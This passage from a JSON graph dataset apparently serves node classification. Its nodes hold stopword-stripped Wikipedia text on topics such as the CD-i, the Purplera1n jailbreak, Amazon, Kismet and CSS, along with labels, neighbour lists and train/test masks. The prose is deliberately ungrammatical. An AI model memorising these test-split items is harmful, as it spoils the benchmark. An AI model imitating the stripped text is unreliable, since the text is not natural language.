seanbaby rated wand gamelon one worst video games time however positively received critics often held standout title cd-i october 1994 philips claimed installed base one million units cd-i 1996 wall street journal reported total us sales amounted 400,000 units",
    "neighbors": [
      1121,
      8355,
      9091,
      424,
      5736,
      8937,
      7916,
      10316,
      494,
      2638,
      1776,
      4046,
      6129,
      7983,
      3350,
      921,
      410
    ],
    "mask": "Test"
  },
  {
    "node_id": 8918,
    "label": 4,
    "text": "Purplera1n:purplera1n purplera1n utility jailbreaks version 3.0 iphone os achieved patching firmware device fly meaning edits firmware located device whilst dfu device firmware upgrade mode allowed users install either cydia rock app cydia alternative allowed user gain access root directory file system gaining access users could install themes tweaks homebrew applications purplera1n superseded blackra1n",
    "neighbors": [
      9762,
      9518,
      7983,
      5138,
      9972,
      7420,
      4957
    ],
    "mask": "None"
  },
  {
    "node_id": 8919,
    "label": 2,
    "text": "GeeksPhone_Peak:geeksphone peak geeksphone peak low-end smartphone released geeksphone april 2013 intended software developers wanting build test mobile applications new firefox os general consumers peak entry-level keon first commercially available mobile devices running firefox os geeksphone keon peak initially became available 23 april 2013 first batch sold hours unlike lower-end geeksphone keon peak fully open source contains requires proprietary qualcomm code geeksphone peak+ improved version original peak first announced 16 july 2013 unlike original peak peak+ customer-oriented device features twice ram original peak added compass sensor peak+ also features exterior dimensions peak geeksphone estimates shipping peak+ devices start november 2013 've issues material providers n't complying given dates mozilla allow geeksphone peak+ called firefox os device insists described device based boot gecko technology said mozilla yet make mind regarding firefox os certification entails favors carrier supports start-ups geeksphone geeksphone assures despite mozilla wanting support peak/peak+ display resolution internals peak+ exactly original peak without mozilla logos peak running certified copy firefox os 1.1 geeksphone peak+ cancelled 28 november 2013",
    "neighbors": [
      7492,
      10884,
      9863,
      5963,
      9964,
      2383,
      1776,
      2259,
      9913,
      1083
    ],
    "mask": "None"
  },
  {
    "node_id": 8920,
    "label": 4,
    "text": "Laplink:laplink laplink proprietary piece software used synchronize laptops desktops using parallel port serial port laplink cable laplink typically shipped serial parallel cables serial cables much lower data transfer rate parallel cables later laplink iterations shipped ethernet cables port port traffic",
    "neighbors": [
      6993,
      8659,
      780
    ],
    "mask": "Test"
  },
  {
    "node_id": 8921,
    "label": 7,
    "text": "Amazon_(company):amazon company amazon.com inc. american multinational technology company based seattle washington focuses e-commerce cloud computing digital streaming artificial intelligence considered one big four technology companies along google apple facebook amazon known disruption well-established industries technological innovation mass scale world largest e-commerce marketplace ai assistant provider cloud computing platform measured revenue market capitalization amazon largest internet company revenue world second largest private employer united states one world valuable companies amazon second largest technology company revenue amazon founded jeff bezos july 5 1994 bellevue washington company initially started online marketplace books later expanded sell electronics software video games apparel furniture food toys jewelry 2015 amazon surpassed walmart valuable retailer united states market capitalization 2017 amazon acquired whole foods market 13.4 billion vastly increased amazon presence brick-and-mortar retailer 2018 bezos announced two-day delivery service amazon prime surpassed 100 million subscribers worldwide amazon distributes downloads streaming video music audiobook amazon prime video amazon music audible subsidiaries amazon also publishing arm amazon publishing film television studio amazon studios cloud computing subsidiary amazon web services produces consumer electronics including kindle e-readers fire tablets fire tv echo devices addition amazon subsidiaries also include ring twitch.tv whole foods market imdb among various controversies company criticized technological surveillance overreach hyper-competitive demanding work culture tax avoidance anti-competitive practices 1994 jeff bezos incorporated amazon chose location seattle technical talent microsoft located may 1997 organization went public company began selling music videos 1998 time began operations internationally acquiring online sellers books united kingdom germany following year organization also sold video games consumer electronics home-improvement items software games toys addition items 2002 corporation started amazon web services aws provided data web site popularity internet traffic patterns statistics marketers developers 2006 organization grew aws portfolio elastic compute cloud ec2 rents computer processing power well simple storage service s3 rents data storage via internet made available year company started fulfillment amazon managed inventory individuals small companies selling belongings company internet site 2012 amazon bought kiva systems automate inventory-management business purchasing whole foods market supermarket chain five years later 2017. board directors 2000 u.s. toy retailer toys r us entered 10-year agreement amazon valued 50 million per year plus cut sales toys r us would exclusive supplier toys baby products service chain website would redirect amazon toys games category 2004 toys r us sued amazon claiming perceived lack variety toys r us stock amazon knowingly allowed third-party sellers offer items service categories toys r us granted exclusivity 2006 court ruled favor toys r us giving right unwind agreement amazon establish independent e-commerce website company later awarded 51 million damages 2001 amazon entered similar agreement borders group amazon would co-manage borders.com co-branded service borders pulled arrangement 2007 plans also launch online store october 18 2011 amazon.com announced partnership dc comics exclusive digital rights many popular comics including superman batman green lantern sandman watchmen partnership caused well-known bookstores like barnes noble remove titles shelves november 2013 amazon announced partnership united states postal service begin delivering orders sundays service included amazon standard shipping rates initiated metropolitan areas los angeles new york high-volume inability deliver timely way plans expand dallas houston new orleans phoenix 2014 june 2017 nike confirmed pilot partnership amazon sell goods directly platform amazonfresh sold range booths branded products home delivery selected areas september 2017 amazon ventured one sellers jv appario retail owned patni group recorded total income us 104.44 million ₹ 759 crore financial year 2017–18 november 2018 amazon reached agreement apple inc. sell selected products service via company selected apple authorized resellers result partnership apple authorized resellers may sell apple products amazon effective january 4 2019 amazon.com product lines available website include several media books dvds music cds videotapes software apparel baby products consumer electronics beauty products gourmet food groceries health personal-care items industrial scientific supplies kitchen items jewelry watches lawn garden items musical instruments sporting goods tools automotive items toys games amazon separate retail websites countries also offers international shipping products certain countries amazon.com number products services available including amazon owns 40 subsidiaries including zappos shopbop diapers.com kiva systems amazon robotics audible goodreads teachstreet twitch imdb a9.com company focused researching building innovative technology subsidiary since 2003 amazon maritime inc. holds federal maritime commission license operate non-vessel-owning common carrier nvocc enables company manage shipments china united states audible.com seller producer spoken audio entertainment information educational programming internet audible sells digital audiobooks radio tv programs audio versions magazines newspapers production arm audible studios audible also become world largest producer downloadable audiobooks january 31 2008 amazon announced would buy audible 300 million deal closed march 2008 audible became subsidiary amazon beijing century joyo courier services subsidiary amazon applied freight forwarding license us maritime commission amazon also building logistics trucking air freight potentially compete ups fedex brilliance audio audiobook publisher founded 1984 michael snodgrass grand michigan company produced first 8 audio titles 1985 company purchased amazon 2007 undisclosed amount time acquisition brilliance producing 12–15 new titles month operates independent company within amazon 1984 brilliance audio invented technique recording twice much cassette technique involved recording two channels stereo track credited revolutionizing burgeoning audiobook market mid-1980s since made unabridged books affordable comixology cloud-based digital comics platform 200 million comic downloads offers selection 40,000 comic books graphic novels across android ios fire os windows 8 devices web browser amazon bought company april 2014 createspace offers self-publishing services independent content creators publishers film studios music labels became subsidiary 2009 eero company manufactures mesh-capable routers company founded 2015 based san francisco amazon announced would buy eero 2019 goodreads social cataloging website founded december 2006 launched january 2007 otis chandler software engineer entrepreneur elizabeth chandler website allows individuals freely search goodreads extensive user-populated database books annotations reviews users sign register books generate library catalogs reading lists also create groups book suggestions discussions december 2007 site 650,000 members 10 million books added amazon bought company march 2013 lab126 developers integrated consumer electronics kindle became subsidiary 2004 amazon announced would fund deploy large broadband satellite internet constellation called project kuiper april 2019 expected take decade fully deploy 3,236 satellites planned full constellation order provide internet tens millions people lack basic access broadband internet amazon announced intend sell broadband service directly consumers offer broadband service partnerships companies satellites use orbit height kuiper work concert amazon previously announced large network 12 satellite ground station facilities aws ground station unit announced november 2018 amazon filed communications license documents us regulatory authorities july 2019 included information wholly owned amazon subsidiary intended deploy satellite constellation kuiper systems llc based seattle washington kuiper system consist 3,236 satellites operating 98 orbital planes altitudes kuiper system includes high-performance satellites terrestrial gateways internetworking technologies range customer terminals president kuiper systems rajeev badyal former vice president spacex satellite internet constellation business unit ring home automation company founded jamie siminoff 2013 primarily known wifi powered smart doorbells manufactures devices security cameras amazon bought ring 1 billion usd 2018 shelfari social cataloging website books shelfari users built virtual bookshelves titles owned read could rate review tag discuss books users could also create groups members could join create discussions talk books topics recommendations could sent friends site books read amazon bought company august 2008 shelfari continued function independent book social network within amazon january 2016 amazon announced would merging shelfari goodreads closing shelfari souq.com largest e-commerce platform middle east based dubai united arab emirates march 28 2017 amazon confirmed would acquiring souq.com 580 million souq.com subsidiary amazon acts amazon arm middle east region twitch live streaming platform video primarily oriented towards video gaming content service first established spin-off general-interest streaming service known justin.tv prominence eclipsed twitch justin.tv eventually shut parent company august 2014 order focus exclusively twitch later month twitch acquired amazon 970 million twitch amazon also owns curse inc. operator video gaming communities provider voip services gaming since acquisition twitch began sell games directly platform began offering special features amazon prime subscribers site rapid growth boosted primarily prominence major esports competitions service leading gamespot senior esports editor rod breslau described service espn esports service 1.5 million broadcasters 100 million monthly viewers whole foods market american supermarket chain exclusively featuring foods without artificial preservatives colors flavors sweeteners hydrogenated fats august 23 2017 reported federal trade commission approved merger amazon.com whole foods market following day announced deal would closed august 28 2017 junglee former online shopping service provided amazon enabled customers search products online offline retailers india junglee started virtual database used extract information internet deliver enterprise applications progressed junglee started use database technology create single window marketplace internet making every item every supplier available purchase web shoppers could locate compare transact millions products across internet shopping mall one window amazon acquired junglee 1998 website junglee.com launched india february 2012 comparison-shopping website curated enabled searching diverse variety products clothing electronics toys jewelry video games among others across thousands online offline sellers millions products browse-able whereby client selects price directed seller november 2017 amazon closed junglee.com former domain currently redirects amazon india amazon first launched distribution network 1997 two fulfillment centers seattle new castle delaware amazon several types distribution facilities consisting crossdock centers fulfillment centers sortation centers delivery stations prime hubs prime air hubs 75 fulfillment centers 25 sortation centers 125,000 employees employees responsible five basic tasks unpacking inspecting incoming goods placing goods storage recording location picking goods computer recorded locations make individual shipment sorting packing orders shipping computer records location goods maps routes pickers plays key role employees carry hand-held computers communicate central computer monitor rate progress domain amazon.com attracted least 615 million visitors annually 2008 amazon attracts 130 million customers us website per month start 2016 company also invested heavily massive amount server capacity website especially handle excessive traffic december christmas holiday season results generated amazon search engine partly determined promotional fees amazon localized storefronts differ selection prices differentiated top-level domain country code amazon allows users submit reviews web page product reviewers must rate product rating scale one five stars amazon provides badging option reviewers indicate real name reviewer based confirmation credit card account indicate reviewer one top reviewers popularity customers may comment vote reviews indicating whether found review helpful review given enough helpful hits appears front page product 2010 amazon reported largest single source internet consumer reviews publishers asked bezos amazon would publish negative reviews defended practice claiming amazon.com taking different approach ... want make every book available—the good bad ugly ... let truth loose cases positive reviews written posted public relations companies behalf clients instances writers using pseudonyms leave negative reviews rivals works search inside book feature allows customers search keywords full text many books catalog feature started 120,000 titles 33 million pages text october 23 2003 300,000 books program amazon cooperated around 130 publishers allow users perform searches avoid copyright violations amazon return computer-readable text book instead returns picture matching page instructs web browser disable printing puts limits number pages book single user access additionally customers purchase online access books via amazon upgrade program amazon derives many sales around 40 2008 third-party sellers sell products amazon associates receive commission referring customers amazon placing links amazon websites referral results sale worldwide amazon 900,000 members affiliate programs middle 2014 amazon affiliate program used 1.2 websites second popular advertising network google ads frequently used websites non-profits provide way supporters earn commission amazon reported 1.3 million sellers sold products amazon websites 2007 unlike ebay amazon sellers maintain separate payment accounts payments handled amazon associates access amazon catalog directly websites using amazon web services aws xml service new affiliate product astore allows associates embed subset amazon products within another website linked another website june 2010 amazon seller product suggestions launched rumored internally called project genesis provide transparency sellers recommending specific products third-party sellers sell amazon products suggested based customers browsing history amazon sales rank asr provides indication popularity product sold amazon locale relative indicator popularity updated hourly effectively best sellers list millions products stocked amazon asr direct effect sales product used amazon determine products include bestsellers lists products appear lists enjoy additional exposure amazon website may lead increase sales particular products experience large jumps sales ranks may included within amazon lists movers shakers listing provides additional exposure might lead increase sales competitive reasons amazon release actual sales figures public however amazon begun release point sale data via nielsen bookscan service verified authors asr source much speculation publishers manufacturers marketers amazon release details sales rank calculation algorithm companies analyzed amazon sales data generate sales estimates based asr though amazon states amazon employs multi-level e-commerce strategy amazon started focusing business-to-consumer relationships customers business-to-business relationships suppliers moved facilitate customer-to-customer amazon marketplace acts intermediary facilitate transactions company lets anyone sell nearly anything using platform addition affiliate program lets anyone post-amazon links earn commission click-through sales program lets affiliates build entire websites based amazon platform large e-commerce sellers use amazon sell products addition selling websites sales processed amazon.com end individual sellers processing order fulfillment amazon leases space retailers small sellers used new goods go amazon marketplace offer goods fixed price amazon also employs use drop shippers meta sellers members entities advertise goods amazon order goods direct competing websites usually amazon members meta sellers may millions products listed large transaction numbers grouped alongside less prolific members giving credibility someone business long time markup anywhere 50 100 sometimes sellers maintain items stock opposite true amazon increases dominance marketplace drop shippers become commonplace recent years november 2015 amazon opened physical amazon books store university village seattle store 5,500 square feet prices products match website amazon open tenth physical book store 2017 media speculation suggests amazon plans eventually roll 300 400 bookstores around country amazon plans open brick mortar bookstores germany amazon.com primarily retail site sales revenue model amazon takes small percentage sale price item sold website also allowing companies advertise products paying listed featured products amazon.com ranked 8th fortune 500 rankings largest united states corporations total revenue fiscal year 2018 amazon reported earnings us 10.07 billion annual revenue us 232.887 billion increase 30.9 previous fiscal cycle since 2007 sales increased 14.835 billion 232.887 billion thanks continued business expansion amazon market capitalization valued us 803 billion early november 2018 since founding company attracted criticism controversy actions including supplying law enforcement facial recognition surveillance tools forming cloud computing partnerships cia leading customers away bookshops adversely impacting environment placing low priority warehouse conditions workers actively opposing unionization efforts remotely deleting content purchased amazon kindle users taking public subsidies seeking patent 1-click technology engaging anti-competitive actions price discrimination reclassifying lgbt books adult content criticism also concerned various decisions whether censor publish content wikileaks website works containing libel material facilitating dogfight cockfight pedophile activities december 2011 amazon faced backlash small businesses running one-day deal promote new price check app shoppers used app check prices brick-and-mortar store offered 5 discount purchase item amazon companies like groupon ebay taap.it countered amazon promotion offering 10 products company also faced accusations putting undue pressure suppliers maintain extend profitability one effort squeeze vulnerable book publishers known within company gazelle project bezos suggested according brad stone amazon approach small publishers way cheetah would pursue sickly gazelle july 2014 federal trade commission launched lawsuit company alleging promoting in-app purchases children transacted without parental consent november 2018 community action group opposed construction permit delivered goodman group construction logisitics platform amazon operate lyon–saint-exupéry airport february 2019 filed request behalf second regional community action group asking administrative court decide whether platform served sufficiently important public interest justify environmental impact construction suspended matters decided october 16 2016 apple filed trademark infringement case mobile star llc selling counterfeit apple products amazon suit apple provided evidence amazon selling counterfeit apple products advertising genuine purchasing apple found able identify counterfeit products success rate 90 amazon sourcing selling items without properly determining genuine mobile star llc settled apple undisclosed amount april 27 2017 amazon state sales tax collection policy changed years since collect sales taxes early years u.s. state local sales taxes levied state local governments federal level countries amazon operates sales tax value added tax uniform throughout country amazon obliged collect customers proponents forcing amazon.com collect sales tax—at least states maintains physical presence—argue corporation wields anti-competitive advantage storefront businesses forced collect sales tax. ref name= bloomberg/businessweek /ref many u.s. states 21st century passed online shopping sales tax laws designed compel amazon.com e-commerce retailers collect state local sales taxes customers amazon.com originally collected sales tax five states amazon collects sales taxes customers 45 states state sales tax washington d.c. amazon paid federal income taxes u.s. 2017 2018 actually got tax refunds worth millions dollars despite recording several billion dollars profits year cnn reported amazon tax bill zero took advantage provisions years losing money allowed offset future taxes profits well various tax credits amazon criticized political figures paying federal income taxes early 2018 president donald trump repeatedly criticized amazon use united states postal service prices delivery packages stating right amazon costing united states post office massive amounts money delivery boy trump tweeted amazon pay costs plus bourne sic american taxpayer amazon shares fell 6 percent result trump comments shepard smith fox news disputed trump claims pointed evidence usps offering below-market prices customers advantage amazon however analyst tom forte pointed fact amazon payments usps made public contract reputation sweetheart deal throughout summer 2018 vermont senator bernie sanders criticized amazon wages working conditions series youtube videos media appearances also pointed fact amazon paid federal income tax previous year sanders solicited stories amazon warehouse workers felt exploited company one story james bloodworth described environment akin low-security prison stated company culture used orwellian newspeak reports cited finding new food economy one third fulfilment center workers arizona supplemental nutrition assistance program snap responses amazon included incentives employees tweet positive stories statement called salary figures used sanders inaccurate misleading statement also charged inappropriate refer snap food stamps september 5 2018 sanders along ro khanna introduced stop bad employers zeroing subsidies stop bezos act aimed amazon alleged beneficiaries corporate welfare walmart mcdonald uber among bill supporters tucker carlson fox news matt taibbi criticized journalists covering amazon contribution wealth inequality earlier october 2 amazon announced minimum wage american employees would raised 15 per hour sanders congratulated company making decision former employees current employees media politicians criticized amazon poor working conditions company 2011 publicized workers carry tasks heat breinigsville pennsylvania warehouse result inhumane conditions employees became extremely uncomfortable suffered dehydration collapse loading-bay doors opened allow fresh air concerns theft amazon initial response pay ambulance sit outside call cart away overheated employees company eventually installed air conditioning warehouse workers pickers travel building trolley handheld scanner picking customer orders walk 15 miles workday fall behind targets reprimanded handheld scanners give real-time information employee quickly slowly working scanners also serve allow team leads area managers track specific locations employees much idle time gain working german television report broadcast february 2013 journalists diana löbl peter onneken conducted covert investigation distribution center amazon town bad hersfeld german state hessen report highlights behavior security guards employed third party company apparently either neo-nazi background deliberately dressed neo-nazi apparel intimidating foreign temporary female workers distribution centers third party security company involved delisted amazon business contact shortly report march 2015 reported verge amazon removing non-compete clauses 18 months length us employment contracts hourly-paid workers criticism acting unreasonably preventing employees finding work even short-term temporary workers sign contracts prohibit working company would directly indirectly support good service competes helped support amazon 18 months leaving amazon even fired made redundant 2015 front-page article new york times profiled several former amazon employees together described bruising workplace culture workers illness personal crises pushed unfairly evaluated bezos responded writing sunday memo employees disputed times account shockingly callous management practices said would never tolerated company effort boost employee morale november 2 2015 amazon announced would extending six weeks paid leave new mothers fathers change includes birth parents adoptive parents applied conjunction existing maternity leave medical leave new mothers mid-2018 investigations journalists media outlets guardian reported poor working conditions amazon fulfillment centers later 2018 another article exposed poor working conditions amazon delivery drivers response criticism amazon n't pay workers livable wage jeff bezos announced beginning november 1 2018 us uk amazon employees earn 15 hour minimum wage amazon also lobby make 15 hour federal minimum wage time amazon also eliminated stock awards bonuses hourly employees black friday 2018 amazon warehouse workers several european countries including italy germany spain united kingdom went strike protest inhumane working conditions low pay daily beast reported march 2019 emergency services responded 189 calls 46 amazon warehouses 17 states years 2013 2018 relating suicidal employees workers attributed mental breakdowns employer-imposed social isolation aggressive surveillance hurried dangerous working conditions fulfillment centers one former employee told daily beast isolating colony hell people breakdowns regular occurrence july 15 2019 onset amazon prime day sale event amazon employees working united states germany went strike protest unfair wages poor working conditions 2013 amazon secured contract cia poses potential conflict interest involving bezos-owned washington post newspaper coverage cia kate martin director center national security studies said serious potential conflict interest major newspaper like washington post contractual relationship government secret part government later followed contract department defence may 2018 amazon threatened seattle city council employee head tax proposal would funded houselessness services low-income housing tax would cost amazon 800 per employee 0.7 average salary retaliation amazon paused construction new building threatened limit investment city funded repeal campaign although originally passed measure soon repealed expensive repeal campaign spearheaded amazon incentives given metropolitan council nashville davidson county amazon new operations center excellence nashville yards site owned developer southwest value partners controversial including decision tennessee department economic community development keep full extent agreement secret incentives include 102 million combined grants tax credits scaled-down amazon office building well 65 million cash grant capital expenditures exchange creation 5,000 jobs seven years tennessee coalition open government called transparency another local organization known people alliance transit housing employment pathe suggested public money given amazon instead spent building public housing working poor homeless investing public transportation nashvillians others suggested incentives big corporations n't improve local economy november 2018 proposal give amazon 15 million incentives criticized nashville firefighters union nashville chapter fraternal order police called corporate welfare february 2019 another 15.2 million infrastructure approved council although voted three council members including councilwoman angie henderson dismissed cronyism amazon publicly opposed secret government surveillance revealed freedom information act requests supplied facial recognition support law enforcement form rekognition technology consulting services initial testing included city orlando florida washington county oregon amazon offered connect washington county amazon government customers interested rekognition body camera manufacturer ventures opposed coalition civil rights groups concern could lead expansion surveillance prone abuse specifically could automate identification tracking anyone particularly context potential police body camera integration backlash city orlando publicly stated longer use technology amazon lobbies united states federal government state governments issues enforcement sales taxes online sales transportation safety privacy data protection intellectual property according regulatory filings amazon.com focuses lobbying united states congress federal communications commission federal reserve amazon.com spent roughly 3.5 million 5 million 9.5 million lobbying 2013 2014 2015 respectively amazon.com corporate member american legislative exchange council alec dropped membership following protests shareholders meeting may 24 2012 2014 amazon expanded lobbying practices prepared lobby federal aviation administration approve drone delivery program hiring akin gump strauss hauer feld lobbying firm june amazon lobbyists visited federal aviation administration officials aviation committees washington d.c. explain plans deliver packages",
    "neighbors": [
      0,
      8064,
      2818,
      8451,
      7044,
      8962,
      9732,
      9863,
      6027,
      6539,
      7820,
      11659,
      1935,
      8719,
      7697,
      5396,
      10393,
      410,
      4890,
      5660,
      7835,
      5918,
      10140,
      10270,
      8865,
      11038,
      4259,
      4388,
      11556,
      424,
      2217,
      5677,
      5295,
      6834,
      8627,
      10681,
      1083,
      10303,
      11201,
      196,
      11333,
      5960,
      5577,
      8905,
      10185,
      11082,
      590,
      7248,
      3412,
      2263,
      7512,
      8921,
      8794,
      10713,
      8668,
      8413,
      735,
      479,
      9569,
      4194,
      1001,
      8170,
      3819,
      4855,
      8554,
      10090,
      6001,
      3828,
      8181,
      119,
      2681,
      5371,
      11646
    ],
    "mask": "Test"
  },
  {
    "node_id": 8922,
    "label": 4,
    "text": "Kismet_(software):kismet software kismet network detector packet sniffer intrusion detection system 802.11 wireless lans kismet work wireless card supports raw monitoring mode sniff 802.11a 802.11b 802.11g 802.11n traffic program runs linux freebsd netbsd openbsd mac os x client also run microsoft windows although aside external drones see one supported wireless hardware available packet source distributed gnu general public license kismet free software kismet differs wireless network detectors working passively namely without sending loggable packets able detect presence wireless access points wireless clients associate also widely used date open source wireless monitoring tool kismet also includes basic wireless ids features detecting active wireless sniffing programs including netstumbler well number wireless network attacks kismet features ability log sniffed packets save tcpdump/wireshark airsnort compatible file format kismet also capture per-packet information headers kismet also features ability detect default configured networks probe requests determine level wireless encryption used given access point order find many networks possible kismet supports channel hopping means constantly changes channel channel non-sequentially user-defined sequence default value leaves big holes channels example 1-6-11-2-7-12-3-8-13-4-9-14-5-10 advantage method capture packets adjacent channels overlap kismet also supports logging geographical coordinates network input gps receiver additionally available kismet three separate parts drone used collect packets pass server interpretation server either used conjunction drone interpreting packet data extrapolating wireless information organizing client communicates server displays information server collects updating kismet -ng kismet supports wide variety scanning plugins including dect bluetooth others kismet used number commercial open source projects distributed kali linux used wireless reconnaissance used packages inexpensive wireless intrusion detection system used number peer reviewed studies detecting rogue access points using kismet",
    "neighbors": [
      6797,
      1429,
      6559,
      10788,
      1064,
      9640,
      7983,
      8497,
      2739,
      7222,
      823,
      61,
      6345,
      842,
      1232,
      2006,
      8922,
      9440,
      4580,
      10346,
      5612,
      2292,
      5245,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 8923,
    "label": 9,
    "text": "Cascading_Style_Sheets:cascading style sheets cascading style sheets css style sheet language used describing presentation document written markup language like html css cornerstone technology world wide web alongside html javascript css designed enable separation presentation content including layout colors fonts separation improve content accessibility provide flexibility control specification presentation characteristics enable multiple web pages share formatting specifying relevant css separate .css file reduce complexity repetition structural content separation formatting content also makes feasible present markup page different styles different rendering methods on-screen print voice via speech-based browser screen reader braille-based tactile devices css also rules alternate formatting content accessed mobile device name cascading comes specified priority scheme determine style rule applies one rule matches particular element cascading priority scheme predictable css specifications maintained world wide web consortium w3c internet media type mime type codice_1 registered use css rfc 2318 march 1998 w3c operates free css validation service css documents addition html markup languages support use css including xhtml plain xml svg xul css simple syntax uses number english keywords specify names various style properties style sheet consists list rules rule rule-set consists one selectors declaration block css selectors declare part markup style applies matching tags attributes markup selectors may apply following classes ids case-sensitive start letters include alphanumeric characters hyphens underscores class may apply number instances elements id may applied single element pseudo-classes used css selectors permit formatting based information contained document tree one example widely used pseudo-class identifies content user points visible element usually holding mouse cursor appended selector pseudo-class classifies document elements whereas pseudo-element makes selection may consist partial elements selectors may combined many ways achieve great specificity flexibility multiple selectors may joined spaced list specify elements location element type id class combination thereof order selectors important example applies elements class myclass inside div elements whereas applies div elements elements class myclass following table provides summary selector syntax indicating usage version css introduced declaration block consists list declarations braces declaration consists property colon codice_2 value multiple declarations block semi-colon codice_3 must inserted separate declaration properties specified css standard property set possible values properties affect type element others apply particular groups elements values may keywords center inherit numerical values 200 pixels 50 percent viewport width 80 percent parent element width color values specified keywords e.g hexadecimal values e.g also abbreviated rgb values 0 255 scale e.g codice_4 rgba values specify color alpha transparency e.g hsl hsla values e.g non-zero numeric values representing linear measures must include length unit either alphabetic code abbreviation codice_5 codice_6 percentage sign codice_7 units – codice_8 centimetre codice_9 inch codice_10 millimetre codice_11 pica codice_12 point – absolute means rendered dimension depend upon structure page others – codice_13 em codice_14 ex codice_15 pixel – relative means factors font size parent element affect rendered measurement eight units feature css 1 retained subsequent revisions proposed css values units module level 3 adopted w3c recommendation provide seven length units codice_16 codice_17 codice_18 codice_19 codice_20 codice_21 codice_22 css nearly presentational attributes html documents contained within html markup font colors background styles element alignments borders sizes explicitly described often repeatedly within html css lets authors move much information another file style sheet resulting considerably simpler html example headings codice_23 elements sub-headings codice_24 sub-sub-headings codice_25 etc. defined structurally using html print screen choice font size color emphasis elements presentational css document authors wanted assign typographic characteristics say codice_24 headings repeat html presentational markup occurrence heading type made documents complex larger error-prone difficult maintain css allows separation presentation structure css define color font text alignment size borders spacing layout many typographic characteristics independently on-screen printed views css also defines non-visual styles reading speed emphasis aural text readers w3c deprecated use presentational html markup example pre-css html heading element defined red text would written using css element coded using style properties instead html presentational attributes advantages may immediately clear since second form actually verbose power css becomes apparent style properties placed internal style element even better external css file example suppose document contains style element codice_23 elements document automatically become red without requiring explicit code author later wanted make codice_23 elements blue instead could done changing style element rather laboriously going document changing color individual codice_23 element styles also placed external css file described loaded using syntax similar decouples styling html document makes possible restyle multiple documents simply editing shared external css file css information provided various sources sources web browser user author information author classified inline media type importance selector specificity rule order inheritance property definition css style information separate document embedded html document multiple style sheets imported different styles applied depending output device used example screen version quite different printed version authors tailor presentation appropriately medium style sheet highest priority controls content display declarations set highest priority source passed source lower priority user agent style process called cascading one goals css allow users greater control presentation someone finds red italic headings difficult read may apply different style sheet depending browser web site user may choose various style sheets provided designers may remove added styles view site using browser default styling may override red italic heading style without altering attributes specificity refers relative weights various rules determines styles apply element one rule could apply based specification simple selector e.g h1 specificity 1 class selectors specificity 1,0 id selectors specificity 1,0,0 specificity values carry decimal system commas used separate digits css rule 11 elements 11 classes would specificity 11,11 121 thus following rules selectors result indicated specificity consider html fragment example declaration codice_30 attribute overrides one codice_31 element higher specificity thus paragraph appears green inheritance key feature css relies ancestor-descendant relationship operate inheritance mechanism properties applied specified element also descendants inheritance relies document tree hierarchy xhtml elements page based nesting descendant elements may inherit css property values ancestor element enclosing general descendant elements inherit text-related properties box-related properties inherited properties inherited color font letter-spacing line-height list-style text-align text-indent text-transform visibility white-space word-spacing properties inherited background border display float clear height width margin min- max-height -width outline overflow padding position text-decoration vertical-align z-index inheritance used avoid declaring certain properties style sheet allowing shorter css inheritance css inheritance class-based programming languages possible define class b like class modifications css possible style element class modifications however possible define css class b like could used style multiple elements without repeat modifications given following style sheet suppose h1 element emphasizing element em inside color assigned em element emphasized word illustrate inherits color parent element h1 style sheet h1 color pink hence em element likewise pink whitespace properties selectors ignored code snippet functionally equivalent one one common way format css readability indent property give line addition formatting css readability shorthand properties used write code faster also gets processed quickly rendered css 2.1 defines three positioning schemes four possible values position property item positioned way static properties top bottom left right used specify offsets positions codice_32 property may one three values absolutely positioned fixed items floated elements normally flow around floated items unless prevented codice_33 property css first proposed håkon wium lie october 10 1994 time lie working tim berners-lee cern several style sheet languages web proposed around time discussions public mailing lists inside world wide web consortium resulted first w3c css recommendation css1 released 1996 particular proposal bert bos influential became co-author css1 regarded co-creator css style sheets existed one form another since beginnings standard generalized markup language sgml 1980s css developed provide style sheets web one requirement web style sheet language style sheets come different sources web therefore existing style sheet languages like dsssl fosi suitable css hand let document style influenced multiple style sheets way cascading styles html grew came encompass wider variety stylistic capabilities meet demands web developers evolution gave designer control site appearance cost complex html variations web browser implementations violawww worldwideweb made consistent site appearance difficult users less control web content displayed browser/editor developed tim berners-lee style sheets hard-coded program style sheets could therefore linked documents web robert cailliau also cern wanted separate structure presentation different style sheets could describe different presentation printing screen-based presentations editors improving web presentation capabilities topic interest many web community nine different style sheet languages proposed www-style mailing list nine proposals two especially influential became css cascading html style sheets stream-based style sheet proposal ssp two browsers served testbeds initial proposals lie worked yves lafon implement css dave raggett arena browser bert bos implemented ssp proposal argo browser thereafter lie bos worked together develop css standard h removed name style sheets could also applied markup languages besides html lie proposal presented mosaic web conference later called www2 chicago illinois 1994 bert bos 1995 around time w3c already established took interest development css organized workshop toward end chaired steven pemberton resulted w3c adding work css deliverables html editorial review board erb lie bos primary technical staff aspect project additional members including thomas reardon microsoft participating well august 1996 netscape communication corporation presented alternative style sheet language called javascript style sheets jsss spec never finished deprecated end 1996 css ready become official css level 1 recommendation published december development html css dom taking place one group html editorial review board erb early 1997 erb split three working groups html working group chaired dan connolly w3c dom working group chaired lauren wood softquad css working group chaired chris lilley w3c css working group began tackling issues addressed css level 1 resulting creation css level 2 november 4 1997 published w3c recommendation may 12 1998 css level 3 started 1998 still development 2014 2005 css working groups decided enforce requirements standards strictly meant already published standards like css 2.1 css 3 selectors css 3 text pulled back candidate recommendation working draft level css 1 specification completed 1996 microsoft internet explorer 3 released year featuring limited support css ie 4 netscape 4.x added support typically incomplete many bugs prevented css usefully adopted three years web browser achieved near-full implementation specification internet explorer 5.0 macintosh shipped march 2000 first browser full better 99 percent css 1 support surpassing opera leader since introduction css support fifteen months earlier browsers followed soon afterwards many additionally implemented parts css 2 however even later 'version 5 web browsers began offer fairly full implementation css still incorrect certain areas fraught inconsistencies bugs quirks microsoft internet explorer 5.x windows opposed different ie macintosh flawed implementation 'css box model compared css standards inconsistencies variation feature support made difficult designers achieve consistent appearance across browsers platforms without use workarounds termed css hacks filters ie/windows box model bugs serious internet explorer 6 released microsoft introduced backwards-compatible mode css interpretation 'quirks mode alongside alternative corrected 'standards mode non-microsoft browsers also provided 'mode'-switch behavior capability therefore became necessary authors html files ensure contained special distinctive 'standards-compliant css intended marker show authors intended css interpreted correctly compliance standards opposed intended long-obsolete ie5/windows browser without marker web browsers 'quirks mode'-switching capability size objects web pages ie5/windows would rather following css standards problems patchy adoption css along errata original specification led w3c revise css 2 standard css 2.1 moved nearer working snapshot current css support html browsers css 2 properties browser successfully implemented dropped cases defined behaviors changed bring standard line predominant existing implementations css 2.1 became candidate recommendation february 25 2004 css 2.1 pulled back working draft status june 13 